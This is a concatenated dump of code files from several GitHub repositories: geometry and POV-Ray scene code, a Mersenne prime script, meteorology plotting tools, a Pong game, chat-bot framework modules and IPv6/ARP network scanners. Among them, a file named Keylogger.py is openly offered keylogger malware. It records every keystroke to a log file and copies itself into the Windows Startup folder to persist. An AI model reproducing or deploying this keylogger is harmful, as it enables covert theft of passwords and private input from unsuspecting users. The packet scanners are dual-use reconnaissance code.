('w','q','x'),('w','u','x'),
('p','o','q'),('p','r','q'),
('r','y','v'),('r','x','v'),
('z','s','t'),('t','y','v'),
('y','p','r'),('r','q','x'),
('x','u','v'),('u','s','w'),
('w','q','o'),('o','z','p'))
self.edges = self._distill()
class Cuboctahedron (Polyhedron):
def __init__(self):
# 8 vertices
self.edge_color = "rgb <1, 1, 0>"
self.edge_radius= 0.03
self.vert_color = "rgb <1, 1, 0>"
self.vert_radius= 0.03
self.face_color = "rgb <0, 0, 0>"
self.vertexes = dict(o = O,
p = P,
q = Q,
r = R,
s = S,
t = T,
u = U,
v = V,
w = W,
x = X,
y = Y,
z = Z)
self.name = "Cuboctahedron"
self.volume = 20
self.center = ORIGIN
# 6 faces
self.faces = (('o','w','s','z'),('z','p','y','t'),
('t','v','u','s'),('w','q','x','u'),
('o','p','r','q'),('r','y','v','x'),
('z','s','t'),('t','y','v'),
('y','p','r'),('r','q','x'),
('x','u','v'),('u','s','w'),
('w','q','o'),('o','z','p'))
self.edges = self._distill()
class Struts(Polyhedron):
def __init__(self, c=None, ico=None, suppress=False):
self.edge_color = "rgb <1, 0, 0>"
self.edge_radius= 0.02
self.vert_color = "rgb <1, 0, 0>"
self.vert_radius= 0.02
self.face_color = "rgb <0, 0, 0>"
self.suppress = suppress
if not c and not ico:
c = Cube()
ico = Icosahedron()
self.vertexes = dict(
# cube mid-edges
af = (c.vertexes['a'] + c.vertexes['f'])/2,
ag = (c.vertexes['a'] + c.vertexes['g'])/2,
ah = (c.vertexes['a'] + c.vertexes['h'])/2,
be = (c.vertexes['b'] + c.vertexes['e'])/2,
bh = (c.vertexes['b'] + c.vertexes['h'])/2,
bg = (c.vertexes['b'] + c.vertexes['g'])/2,
ce = (c.vertexes['c'] + c.vertexes['e'])/2,
cf = (c.vertexes['c'] + c.vertexes['f'])/2,
ch = (c.vertexes['c'] + c.vertexes['h'])/2,
de = (c.vertexes['d'] + c.vertexes['e'])/2,
df = (c.vertexes['d'] + c.vertexes['f'])/2,
dg = (c.vertexes['d'] + c.vertexes['g'])/2,
# icosa mid-edges
# OPPOSITE DIAGONALS of cubocta
# ZY WX
# RV OS
# TU PQ
os = (ico.vertexes['o'] + ico.vertexes['s'])/2,
pq = (ico.vertexes['p'] + ico.vertexes['q'])/2,
rv = (ico.vertexes['r'] + ico.vertexes['v'])/2,
tu = (ico.vertexes['t'] + ico.vertexes['u'])/2,
wx = (ico.vertexes['w'] + ico.vertexes['x'])/2,
yz = (ico.vertexes['y'] + ico.vertexes['z'])/2
)
self.name = 'struts'
self.center = ico.center
self.faces = (('os', 'af'), ('os', 'ch'),
('rv', 'be'), ('rv', 'dg'),
('tu', 'cf'), ('tu', 'de'),
('pq', 'ah'), ('pq', 'bg'),
('yz', 'ag'), ('yz', 'df'),
('wx', 'bh'), ('wx', 'ce'))
if self.suppress:
self.faces = self._suppress()
self.edges = self._distill()
def _suppress(self):
"""
A global IVM of integral Qray positions is expected for
the suppress feature to work. This could be an n-frequency
cuboctahedron or perhaps a layered tetrahedron of half-
octahedron of balls.
"""
global IVM
keep = []
# print("Suppressing disconnected edges")
for f in self.faces:
# print(f, self.center)
neighbor = self.center + eval(f[1][0].upper()) + eval(f[1][1].upper())
# print("Neighbor=", neighbor)
for layer in IVM:
if neighbor in IVM[layer]:
# print("Bing!")
keep.append(f)
break
else:
pass
# print("Not found")
return keep
from itertools import permutations
g = permutations((2,1,1,0))
unique = {p for p in g} # set comprehension
def twelve_around_one(p):
twelve = [ ]
for v in unique:
trans_vector = Qvector(v)
twelve.append(p + trans_vector)
return twelve
pov_header = \
"""
// Persistence of Vision Ray Tracer Scene Description File
// File: xyz.pov
// Vers: 3.6
// Desc: test file
// Date: Sat Sep 7 09:49:33 2019
// Auth: me
// ==== Standard POV-Ray Includes ====
#include "colors.inc" // Standard Color definitions
// include "textures.inc" // Standard Texture definitions
// include "functions.inc" // internal functions usable in user defined functions
// ==== Additional Includes ====
// Don't have all of the following included at once, it'll cost memory and time
// to parse!
// --- general include files ---
// include "chars.inc" // A complete library of character objects, by <NAME>
// include "skies.inc" // Ready defined sky spheres
// include "stars.inc" // Some star fields
// include "strings.inc" // macros for generating and manipulating text strings
// --- textures ---
// include "finish.inc" // Some basic finishes
// include "glass.inc" // Glass textures/interiors
// include "golds.inc" // Gold textures
// include "metals.inc" // Metallic pigments, finishes, and textures
// include "stones.inc" // Binding include-file for STONES1 and STONES2
// include "stones1.inc" // Great stone-textures created by <NAME>
// include "stones2.inc" // More, done by <NAME> and <NAME>
// include "woodmaps.inc" // Basic wooden colormaps
// include "woods.inc" // Great wooden textures created by <NAME> and <NAME>
global_settings {assumed_gamma 1.0}
global_settings {ambient_light rgb<1, 1, 1> }
// perspective (default) camera
camera {
location <4, 0.1, 0.2>
rotate <35, 35, 10.0>
look_at <0.0, 0.0, 0.0>
right x*image_width/image_height
}
// create a regular point light source
light_source {
0*x // light's position (translated below)
color rgb <1,1,1> // light's color
translate <-20, 15, 10>
}
// create a regular point light source
light_source {
0*x // light's position (translated below)
color rgb <1,1,1> // light's color
translate <20, -15, -10>
}
background { color rgb <1.0, 1.0, 1.0> }
"""
```
#### File: 4dsolutions/School_of_Tomorrow/mersennes.py
```python
import random
_primes = [2] # global list of primes
def iseven(n):
"""Return true if n is even."""
return n%2==0
def isodd(n):
"""Return true if n is odd."""
return not iseven(n)
def divtrial(n):
"""
Trial by division check whether a number is prime."""
verdict = 1 # default is "yes, add to list"
cutoff = n**0.5 # 2nd root of n
for i in _primes:
if not n%i: # if no remainder
verdict = 0 # then we _don't_ want to add
break
if i >= cutoff: # stop trying to divide by
break # lower primes when p**2 > n
return verdict
def isprime(n):
"""
Divide by primes until n proves composite or prime.
Brute force algorithm, will wimp out for humongous n
return 0 if n is divisible
return 1 if n is prime"""
rtnval = 1
if n == 2: return 1
if n < 2 or iseven(n): return 0
maxnb = n ** 0.5 # 2nd root of n
# if n < largest prime on file, check for n in list
if n <= _primes[-1]: rtnval = (n in _primes)
# if primes up to root(n) on file, run divtrial (a prime test)
elif maxnb <= _primes[-1]: rtnval = divtrial(n)
else:
rtnval = divtrial(n) # check divisibility by primes so far
if rtnval==1: # now, if still tentatively prime...
# start with highest prime so far
i = _primes[-1]
# and add...
i = i + 1 + isodd(i)*1 # next odd number
while i <= maxnb:
if divtrial(i): # test of primehood
_primes.append(i) # append to list if prime
if not n%i: # if n divisible by latest prime
rtnval = 0 # then we're done
break
i=i+2 # next odd number
return rtnval
def pptest(n):
"""
Simple implementation of Miller-Rabin test for
determining probable primehood.
"""
bases = [random.randrange(2,50000) for _ in range(90)]
# if any of the primes is a factor, we're done
if n<=1: return 0
for b in bases:
if n%b==0: return 0
tests,s = 0,0
m = n-1
# turning (n-1) into (2**s) * m
while not m&1: # while m is even
m >>= 1
s += 1
for b in bases:
tests += 1
isprob = algP(m,s,b,n)
if not isprob: break
if isprob: return (1-(1./(4**tests)))
else: return 0
def algP(m,s,b,n):
"""
based on Algorithm P in Donald Knuth's 'Art of
Computer Programming' v.2 pg. 395
"""
result = 0
y = pow(b,m,n)
for j in range(s):
if (y==1 and j==0) or (y==n-1):
result = 1
break
y = pow(y,2,n)
return result
m = 1
for n in range(650):
candidate = 2**n - 1
if len(str(candidate)) < 10:
if isprime(candidate):
print(f"M{m} = 2**{n}-1 = {candidate}")
m += 1
else:
if pptest(2**n-1):
print(f"M{m} = 2**{n}-1 = {candidate}")
m += 1
``` |
{
"source": "4dvar/py_meteo_tools",
"score": 4
} |
#### File: py_meteo_tools/py_meteo_tools/dewpoint.py
```python
import sys
import numpy as np
# approximation valid for
# 0 degrees Celsius < T < 60 degrees Celcius
# 1% < RH < 100%
# 0 degrees Celcius < Td < 50 degrees Celcius
# constants
a = 17.271
b = 237.7 # in units of degrees Celcius
def dewpoint_approximation(T,RH):
"""
PURPOSE:
approximate the dewpoint given temperature and relative humidty
INPUT:
T: temperature
RH: relative humidity
"""
Td = (b * gamma(T,RH)) / (a - gamma(T,RH))
return Td
def gamma(T,RH):
"""
PURPOSE:
helper function used to calc. dewpoint
INPUT:
T: temperature
RH: relative humidity
"""
g = (a * T / (b + T)) + np.log(RH/100.0)
return g
if __name__ == '__main__':
# sys.argv[0] is program name
T=float(sys.argv[1])
RH=float(sys.argv[2])
Td = dewpoint_approximation(T,RH)
print('T, RH: '+str(T)+u'°C, '+str(RH)+'%')
print('Td: '+str(Td))
# USAGE: python dewpoint.py T RH
# e.g. python dewpoint.py 10 98
```
#### File: py_meteo_tools/py_meteo_tools/rebin.py
```python
import numpy as np
def rebin(a, new_shape):
"""
PURPOSE:
Resizes a 2d array by averaging or repeating elements,
new dimensions must be integral factors of original dimensions
INPUT:
a : array_like
Input array.
new_shape : tuple of int
Shape of the output array
OUTPUT:
rebinned_array : ndarray
If the new shape is smaller of the input array, the data are averaged,
if the new shape is bigger array elements are repeated
EXAMPLES:
>>> a = np.array([[0, 1], [2, 3]])
>>> b = rebin(a, (4, 6)) #upsize
>>> b
array([[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 1, 1],
[2, 2, 2, 3, 3, 3],
[2, 2, 2, 3, 3, 3]])
>>> c = rebin(b, (2, 3)) #downsize
>>> c
array([[ 0. , 0.5, 1. ],
[ 2. , 2.5, 3. ]])
"""
M, N = a.shape
m, n = new_shape
if m<M:
return a.reshape((m,M/m,n,N/n)).mean(3).mean(1)
else:
return np.repeat(np.repeat(a, m/M, axis=0), n/N, axis=1)
if __name__ == '__main__':
pass
```
#### File: py_meteo_tools/py_meteo_tools/skewt_logp.py
```python
import sys
import math
import numpy as np
import pylab as pl
# most of the code adapted from pywrfplot
# http://code.google.com/p/pywrfplot/
# PURPOSE: plot raw data of Temperature and Dewpoint in skewT-log(p)-diagram
# define constants
skewness = 37.5
# Defines the ranges of the plot, do not confuse with P_bot and P_top
P_b = 105000.
P_t = 10000.
dp = 100.
plevs = np.arange(P_b,P_t-1,-dp)
T_zero = 273.15
P_top = 10**4
P_bot = 10**5
L = 2.501e6 # latent heat of vaporization
R = 287.04 # gas constant air
Rv = 461.5 # gas constant vapor
eps = R/Rv
cp = 1005.
cv = 718.
kappa = (cp-cv)/cp
g = 9.81
# constants used to calculate moist adiabatic lapse rate
# See formula 3.16 in Rogers&Yau
a = 2./7.
b = eps*L*L/(R*cp)
c = a*L/R
def SkewTPlot(filename_soundingdata):
pl.figure()
_isotherms()
_isobars()
_dry_adiabats()
_moist_adiabats()
_mixing_ratio()
_plot_data(filename_soundingdata)
pl.axis([-40,50,P_b,P_t])
pl.xlabel(r'Temperature ($^{\circ}\! C$)')
xticks = np.arange(-40,51,5)
pl.xticks(xticks,['' if tick%10!=0 else str(tick) for tick in xticks])
pl.ylabel('Pressure (hPa)')
yticks = np.arange(P_bot,P_t-1,-10**4)
pl.yticks(yticks,yticks/100)
pl.show()
pl.close()
pl.clf()
def _skewnessTerm(P):
return skewness * np.log(P_bot/P)
def _isotherms():
for temp in np.arange(-100,50,10):
pl.semilogy(temp + _skewnessTerm(plevs), plevs, basey=math.e, \
color = ('blue'), \
linestyle=('solid' if temp == 0 else 'dashed'), linewidth = .5)
return
def _isobars():
for n in np.arange(P_bot,P_t-1,-10**4):
pl.plot([-40,50], [n,n], color = 'black', linewidth = .5)
return
def _dry_adiabats():
for tk in T_zero+np.arange(-30,210,10):
dry_adiabat = tk * (plevs/P_bot)**kappa - T_zero + _skewnessTerm(plevs)
pl.semilogy(dry_adiabat, plevs, basey=math.e, color = 'brown', \
linestyle='dashed', linewidth = .5)
return
def es(T):
"""
PURPOSE:
Returns saturation vapor pressure (Pascal) at temperature T (Celsius)
Formula 2.17 in Rogers&Yau
"""
return 611.2*np.exp(17.67*T/(T+243.5))
def gamma_s(T,p):
"""
PURPOSE:
Calculates moist adiabatic lapse rate for T (Celsius) and p (Pa)
Note: We calculate dT/dp, not dT/dz
See formula 3.16 in Rogers&Yau for dT/dz, but this must be combined with the dry adiabatic lapse rate (gamma = g/cp) and the
inverse of the hydrostatic equation (dz/dp = -RT/pg)
"""
esat = es(T)
wsat = eps*esat/(p-esat) # Rogers&Yau 2.18
numer = a*(T+T_zero) + c*wsat
denom = p * (1 + b*wsat/((T+T_zero)**2))
return numer/denom # Rogers&Yau 3.16
def _moist_adiabats():
ps = [p for p in plevs if p<=P_bot]
for temp in np.concatenate((np.arange(-40.,10.1,5.),np.arange(12.5,45.1,2.5))):
moist_adiabat = []
for p in ps:
temp -= dp*gamma_s(temp,p)
moist_adiabat.append(temp + _skewnessTerm(p))
pl.semilogy(moist_adiabat, ps, basey=math.e, color = 'green', \
linestyle = 'dashed', linewidth = .5)
return
def _mixing_ratio():
w = np.array([0.1, 0.4, 1, 2, 4, 7, 10, 16, 24, 32])
w=w*10**(-3)
for wi in w:
mr=[]
for pt in plevs:
e = pt * wi / (eps + wi)
T = 243.5/(17.67/np.log(e/611.2) - 1)
mr.append(T + _skewnessTerm(pt))
if pt==100000.0: mr_ticks = T + _skewnessTerm(pt)
pl.semilogy(mr, plevs, basey=math.e, color = 'red', \
linestyle = 'dashed', linewidth = 1.0)
pl.annotate(str(wi*10**3), xy=(mr_ticks, 100000), xytext=(-15.0,5.0), xycoords='data', textcoords='offset points', color='red')
return
def _windbarbs(speed,theta,p): # in kt
x = np.cos(np.radians(270-theta)) # direction only
y = np.sin(np.radians(270-theta)) # direction only
u = x*speed
v = y*speed
for item in zip(p,theta,speed,x,y,u,v):
print(item)
i=0
for pi in p*100:
pl.barbs(45,pi,u[i],v[i])
i=i+1
return
def _plot_data(filename_soundingdata):
p,h,T,Td,rh,m,theta,speed = np.loadtxt(filename_soundingdata,usecols=range(0,8),unpack=True)
pl.semilogy(T+ _skewnessTerm(p*100),p*100,basey=math.e, color=('black'),linestyle=('solid'),linewidth= 1.5)
pl.semilogy(Td+ _skewnessTerm(p*100),p*100,basey=math.e, color=('black'),linestyle=('solid'),linewidth= 1.5)
_windbarbs(speed,theta,p)
return
if __name__ == '__main__':
# sounding data can be downloaded e.g. from http://weather.uwyo.edu/upperair/sounding.html
# make sure to only use only the actual sounding data without header/footer
filename_soundingdata = sys.argv[1]
SkewTPlot(filename_soundingdata)
# USAGE: python skewt_logp.py input_data.txt
``` |
{
"source": "4E756E6F/Hacks",
"score": 3
} |
#### File: 4E756E6F/Hacks/Keylogger.py
```python
import os
import logging
from pynput.keyboard import Listener
from shutil import copyfile
username = os.getlogin()
logging_directory = f"/home/{username}/Desktop"
copyfile('keylogger.py',
f'C:/Users/{username}/AppData/Roaming/Microsoft/Start Menu/Startup/keylogger.py')
logging.basicConfig(filename=f"{logging_directory}/mylog.txt",
level=logging.DEBUG, format="%(asctime)s: %(message)s")
def key_handler(key):
logging.info(key)
with Listener(on_press=key_handler) as listener:
listener.join()
``` |
{
"source": "4E756E6F/Pong_Game",
"score": 4
} |
#### File: 4E756E6F/Pong_Game/pong.py
```python
import pygame
import sys
class Ball:
def __init__(self, screen, color, posX, posY, radius):
self.screen = screen
self.color = color
self.posX = posX
self.posY = posY
self.radius = radius
self.bx = 0
self.by = 0
self.draw_ball()
def draw_ball(self):
pygame.draw.circle(self.screen, self.color,
(self.posX, self.posY), self.radius)
def start_moving(self):
self.bx = 15
self.by = 5
def movement(self):
self.posX += self.bx
self.posY += self.by
class Player:
def __init__(self, screen, color, posX, posY, width, height):
self.screen = screen
self.color = color
self.posX = posX
self.posY = posY
self.width = width
self.height = height
self.draw_player()
def draw_player(self):
pygame.draw.rect(self.screen, self.color, (self.posX,
self.posY, self.width, self.height))
# ? MODULE INITIALIZER
pygame.init()
# ? CONSTANTS
WIDTH = 900
HEIGHT = 780
BACKGROUND_COLOR = (32, 32, 32)
WHITE = (224, 224, 224)
screen = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption('PONG')
def paint_background():
screen.fill(BACKGROUND_COLOR)
pygame.draw.line(screen, WHITE, (WIDTH//2, 0), (WIDTH//2, HEIGHT), width=2)
paint_background()
# ? OBJECTS
ball = Ball(screen, WHITE, WIDTH//2, HEIGHT//2, 15)
player_left = Player(screen, WHITE, 15, HEIGHT//2-60, 20, 120)
player_right = Player(screen, WHITE, WIDTH-20-15, HEIGHT//2-60, 20, 120)
# ? VARIABLES
playing = False
# ? MAIN LOOP
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
if event.type == pygame.KEYDOWN:
if event.type == pygame.K_KP_ENTER:
ball.start_moving()
playing = True
if playing:
# * BALL MOVEMENT
ball.movement()
ball.draw_ball()
pygame.display.update()
``` |
{
"source": "4eexotel/vkbottle",
"score": 2
} |
#### File: views/bot/message.py
```python
from abc import ABC
from typing import Any, Callable, List, Optional
from vkbottle_types.events import GroupEventType
from vkbottle.api.abc import ABCAPI
from vkbottle.dispatch.dispenser.abc import ABCStateDispenser
from vkbottle.dispatch.handlers import ABCHandler
from vkbottle.dispatch.middlewares import BaseMiddleware, MiddlewareResponse
from vkbottle.dispatch.return_manager.bot import BotMessageReturnHandler
from vkbottle.modules import logger
from vkbottle.tools.dev_tools import message_min
from vkbottle.tools.dev_tools.mini_types.bot import MessageMin
from ..abc_dispense import ABCDispenseView
DEFAULT_STATE_KEY = "peer_id"
class ABCMessageView(ABCDispenseView, ABC):
def __init__(self):
self.state_source_key = DEFAULT_STATE_KEY
self.handlers: List["ABCHandler"] = []
self.middlewares: List["BaseMiddleware"] = []
self.default_text_approximators: List[Callable[[MessageMin], str]] = []
self.handler_return_manager = BotMessageReturnHandler()
async def process_event(self, event: dict) -> bool:
return GroupEventType(event["type"]) == GroupEventType.MESSAGE_NEW
async def handle_event(
self, event: dict, ctx_api: "ABCAPI", state_dispenser: "ABCStateDispenser"
) -> Any:
logger.debug("Handling event ({}) with message view".format(event.get("event_id")))
context_variables = {}
message = message_min(event, ctx_api)
message.state_peer = await state_dispenser.cast(self.get_state_key(event))
for text_ax in self.default_text_approximators:
message.text = text_ax(message)
for middleware in self.middlewares:
response = await middleware.pre(message)
if response == MiddlewareResponse(False):
return []
elif isinstance(response, dict):
context_variables.update(response)
handle_responses = []
handlers = []
for handler in self.handlers:
result = await handler.filter(message)
logger.debug("Handler {} returned {}".format(handler, result))
if result is False:
continue
elif isinstance(result, dict):
context_variables.update(result)
handler_response = await handler.handle(message, **context_variables)
handle_responses.append(handler_response)
handlers.append(handler)
return_handler = self.handler_return_manager.get_handler(handler_response)
if return_handler is not None:
await return_handler(
self.handler_return_manager, handler_response, message, context_variables
)
if handler.blocking:
break
for middleware in self.middlewares:
await middleware.post(message, self, handle_responses, handlers)
class MessageView(ABCMessageView):
def get_state_key(self, event: dict) -> Optional[int]:
return event["object"]["message"].get(self.state_source_key)
```
#### File: http/middleware/abc.py
```python
import typing
from abc import ABC, abstractmethod
HTTPMiddlewareResponse = typing.NewType("HTTPMiddlewareResponse", bool)
class ABCHTTPMiddleware(ABC):
""" Abstract class for http-client middleware
Documentation: https://github.com/timoniq/vkbottle/tree/v3.0/docs/http/http-middleware.md
"""
@abstractmethod
async def pre(
self, method: str, url: str, data: typing.Optional[dict] = None, **kwargs
) -> typing.Optional[HTTPMiddlewareResponse]:
pass
@abstractmethod
async def post(self, response: typing.Any):
pass
```
#### File: tools/dev_tools/auto_reload.py
```python
import os
import sys
from watchgod import awatch
from vkbottle.modules import logger
_startup_cwd = os.getcwd()
def restart():
""" https://github.com/cherrypy/cherrypy/blob/0857fa81eb0ab647c7b59a019338bab057f7748b/cherrypy/process/wspbus.py#L305
"""
args = sys.argv[:]
logger.debug("Restarting: %s" % " ".join(args))
args.insert(0, sys.executable)
if sys.platform == "win32":
args = ['"%s"' % arg for arg in args]
os.chdir(_startup_cwd)
os.execv(sys.executable, args)
async def watch_to_reload(check_dir: str):
"""
Coro which see changes in your code and restart him.
:return:
"""
async for _ in awatch(check_dir):
logger.info("Changes were found. Restarting...")
restart()
``` |
{
"source": "4ekin/raw-packet",
"score": 3
} |
#### File: raw_packet/Scanners/icmpv6_scanner.py
```python
from raw_packet.Utils.base import Base
from raw_packet.Utils.network import RawEthernet, RawIPv6, RawICMPv6
from raw_packet.Utils.tm import ThreadManager
# endregion
# region Import libraries
from socket import socket, AF_PACKET, SOCK_RAW, htons
from time import sleep
from random import randint
from typing import Union, Dict, List
# endregion
# endregion
# region Authorship information
__author__ = '<NAME>'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
__status__ = 'Development'
# endregion
# region class ICMPv6 scanner
class ICMPv6Scan:
# region Set variables
base: Base = Base()
eth: RawEthernet = RawEthernet()
ipv6: RawIPv6 = RawIPv6()
icmpv6: RawICMPv6 = RawICMPv6()
raw_socket: socket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
network_interface: Union[None, str] = None
your_mac_address: Union[None, str] = None
your_ipv6_link_address: Union[None, str] = None
target_mac_address: str = '33:33:00:00:00:01'
results: List[Dict[str, str]] = list()
unique_results: List[Dict[str, str]] = list()
mac_addresses: List[str] = list()
retry_number: int = 3
timeout: int = 3
icmpv6_identifier: int = 0
router_info: Dict[str, Union[int, str]] = dict()
router_search: bool = False
# endregion
# region Sniffer
def _sniff(self) -> None:
"""
Sniff ICMPv6 packets
:return: None
"""
while True:
packets = self.raw_socket.recvfrom(2048)
for packet in packets:
try:
# Parse Ethernet header
ethernet_header = packet[0:14]
ethernet_header_dict = self.eth.parse_header(packet=ethernet_header)
# Parse Ethernet header
assert ethernet_header_dict is not None, 'Not Ethernet packet!'
# Source MAC address is target mac address
if not self.router_search:
if self.target_mac_address != '33:33:00:00:00:01':
assert ethernet_header_dict['source'] == self.target_mac_address, \
'Bad source MAC address!'
# Destination MAC address is your MAC address
if not self.router_search:
assert ethernet_header_dict['destination'] == self.your_mac_address, \
'Bad destination MAC address!'
# Check type of ethernet header
assert ethernet_header_dict['type'] == self.ipv6.header_type, 'Not IPv6 packet!'
# Parse IPv6 header
ipv6_header = packet[14:14 + self.ipv6.header_length]
ipv6_header_dict = self.ipv6.parse_header(ipv6_header)
# Check parse IPv6 header
assert ipv6_header_dict is not None, 'Could not parse IPv6 packet!'
# Check IPv6 next header type
assert ipv6_header_dict['next-header'] == self.icmpv6.packet_type, 'Not ICMPv6 packet!'
# Parse ICMPv6 packet
icmpv6_packet = packet[14 + self.ipv6.header_length:]
icmpv6_packet_dict = self.icmpv6.parse_packet(packet=icmpv6_packet)
# Check parse ICMPv6 packet
assert icmpv6_packet_dict is not None, 'Could not parse ICMPv6 packet!'
if self.router_search:
# 134 Type of ICMPv6 Router Advertisement
assert icmpv6_packet_dict['type'] == 134, 'Not ICMPv6 Router Advertisement packet!'
# Save router information
self.router_info['router_mac_address'] = ethernet_header_dict['source']
self.router_info['router_ipv6_address'] = ipv6_header_dict['source-ip']
self.router_info['flags'] = hex(icmpv6_packet_dict['flags'])
self.router_info['router-lifetime'] = int(icmpv6_packet_dict['router-lifetime'])
self.router_info['reachable-time'] = int(icmpv6_packet_dict['reachable-time'])
self.router_info['retrans-timer'] = int(icmpv6_packet_dict['retrans-timer'])
for icmpv6_ra_option in icmpv6_packet_dict['options']:
if icmpv6_ra_option['type'] == 3:
self.router_info['prefix'] = str(icmpv6_ra_option['value']['prefix']) + '/' + \
str(icmpv6_ra_option['value']['prefix-length'])
if icmpv6_ra_option['type'] == 5:
self.router_info['mtu'] = int(icmpv6_ra_option['value'], 16)
if icmpv6_ra_option['type'] == 25:
self.router_info['dns-server'] = str(icmpv6_ra_option['value']['address'])
# Search router vendor
self.router_info['vendor'] = \
self.base.get_vendor_by_mac_address(self.router_info['router_mac_address'])
else:
# 129 Type of ICMPv6 Echo (ping) reply
assert icmpv6_packet_dict['type'] == 129, 'Not ICMPv6 Echo (ping) reply packet!'
# Check ICMPv6 Echo (ping) reply identifier
if icmpv6_packet_dict['identifier'] == self.icmpv6_identifier:
self.results.append({
'mac-address': ethernet_header_dict['source'],
'ip-address': ipv6_header_dict['source-ip']
})
except AssertionError:
pass
# endregion
# region Sender
def _send(self) -> None:
"""
Send ICMPv6 packets
:return: None
"""
self.your_mac_address: str = self.base.get_interface_mac_address(self.network_interface)
self.your_ipv6_link_address: str = self.base.get_interface_ipv6_link_address(self.network_interface)
send_socket: socket = socket(AF_PACKET, SOCK_RAW)
send_socket.bind((self.network_interface, 0))
if self.router_search:
request: bytes = self.icmpv6.make_router_solicit_packet(ethernet_src_mac=self.your_mac_address,
ipv6_src=self.your_ipv6_link_address)
else:
request: bytes = self.icmpv6.make_echo_request_packet(ethernet_src_mac=self.your_mac_address,
ethernet_dst_mac=self.target_mac_address,
ipv6_src=self.your_ipv6_link_address,
ipv6_dst='fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b',
id=self.icmpv6_identifier)
for _ in range(self.retry_number):
send_socket.send(request)
sleep(0.1)
send_socket.close()
# endregion
# region Scanner
def scan(self, network_interface: str = 'eth0', timeout: int = 3, retry: int = 3,
target_mac_address: Union[None, str] = None, check_vendor: bool = True,
exit_on_failure: bool = True) -> List[Dict[str, str]]:
"""
Find alive IPv6 hosts in local network with echo (ping) request packets
:param network_interface: Network interface name (example: 'eth0')
:param timeout: Timeout in seconds (default: 3)
:param retry: Retry number (default: 3)
:param target_mac_address: Target MAC address (example: 192.168.0.1)
:param check_vendor: Check vendor of hosts (default: True)
:param exit_on_failure: Exit if alive IPv6 hosts in network not found (default: True)
:return: List of alive hosts in network (example: [{'mac-address': '01:23:45:67:89:0a', 'ip-address': 'fe80::1234:5678:90ab:cdef', 'vendor': 'Apple, Inc.'}])
"""
# region Clear lists with scan results
self.results.clear()
self.unique_results.clear()
self.mac_addresses.clear()
# endregion
# region Set variables
if target_mac_address is not None:
self.base.mac_address_validation(mac_address=target_mac_address, exit_on_failure=True)
self.target_mac_address = target_mac_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
self.icmpv6_identifier = randint(1, 65535)
# endregion
# region Run _sniffer
tm = ThreadManager(2)
tm.add_task(self._sniff)
# endregion
# region Run _sender
self._send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Unique results
for index in range(len(self.results)):
if self.results[index]['mac-address'] not in self.mac_addresses:
self.unique_results.append(self.results[index])
self.mac_addresses.append(self.results[index]['mac-address'])
# endregion
# region Get vendors
if check_vendor:
for result_index in range(len(self.unique_results)):
self.unique_results[result_index]['vendor'] = \
self.base.get_vendor_by_mac_address(self.unique_results[result_index]['mac-address'])
# endregion
# region Return results
if len(self.unique_results) == 0:
if exit_on_failure:
self.base.error_text('Could not found alive IPv6 hosts on interface: ' + self.network_interface)
exit(1)
return self.unique_results
# endregion
# endregion
# region Search IPv6 router
def search_router(self, network_interface: str = 'eth0', timeout: int = 3, retry: int = 3,
exit_on_failure: bool = True) -> Dict[str, Union[int, str]]:
"""
Search IPv6 router in network
:param network_interface: Network interface name (example: 'eth0')
:param timeout: Timeout in seconds (default: 3)
:param retry: Retry number (default: 3)
:param exit_on_failure: Exit if IPv6 router in network not found (default: True)
:return: IPv6 router information dictionary (example: {'router_mac_address': '01:23:45:67:89:0a', 'router_ipv6_address': 'fe80::1234:5678:90ab:cdef', 'flags': '0x0', 'router-lifetime': 0, 'reachable-time': 0, 'retrans-timer': 0, 'prefix': 'fd00::/64', 'vendor': 'D-Link International'})
"""
# region Clear lists with scan results
self.results.clear()
self.unique_results.clear()
self.mac_addresses.clear()
# endregion
# region Set variables
self.router_search = True
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run _sniffer
tm = ThreadManager(2)
tm.add_task(self._sniff)
# endregion
# region Run _sender
self._send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Return IPv6 router information
if len(self.router_info.keys()) == 0:
if exit_on_failure:
self.base.error_text('Could not found IPv6 Router on interface: ' + self.network_interface)
exit(1)
return self.router_info
# endregion
# endregion
# endregion
```
#### File: raw_packet/Scanners/scanner.py
```python
from raw_packet.Utils.base import Base
from raw_packet.Scanners.arp_scanner import ArpScan
from raw_packet.Scanners.icmpv6_scanner import ICMPv6Scan
# endregion
# region Import libraries
import xml.etree.ElementTree as ET
import subprocess as sub
from prettytable import PrettyTable
from os.path import dirname, abspath, isfile
from os import remove
from typing import Union, List, Dict
current_path = dirname((abspath(__file__)))
# endregion
# endregion
# region Authorship information
__author__ = '<NAME>'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = '<NAME>'
__email__ = '<EMAIL>'
__status__ = 'Development'
# endregion
# region Main class - Scanner
class Scanner:
# region Variables
base: Base = Base()
arp_scan: ArpScan = ArpScan()
icmpv6_scan: ICMPv6Scan = ICMPv6Scan()
nmap_scan_result: str = current_path + '/nmap_scan.xml'
# endregion
# region Init
def __init__(self):
if not self.base.check_installed_software('nmap'):
self.base.print_error('Could not find program: ', 'nmap')
exit(1)
# endregion
# region Apple device selection
def apple_device_selection(self, apple_devices: Union[None, List[List[str]]],
exit_on_failure: bool = False) -> Union[None, List[str]]:
try:
assert apple_devices is not None, 'List of Apple devices is None!'
assert len(apple_devices) != 0, 'List of Apple devices is empty!'
for apple_device in apple_devices:
assert len(apple_device) == 3, \
'Bad list of Apple device, example: [["192.168.0.1", "12:34:56:78:90:ab", "Apple, Inc."]]'
assert (self.base.ip_address_validation(ip_address=apple_device[0]) or
self.base.ipv6_address_validation(ipv6_address=apple_device[0])), \
'Bad list of Apple device, example: [["192.168.0.1", "12:34:56:78:90:ab", "Apple, Inc."]]'
assert self.base.mac_address_validation(mac_address=apple_device[1]), \
'Bad list of Apple device, example: [["192.168.0.1", "12:34:56:78:90:ab", "Apple, Inc."]]'
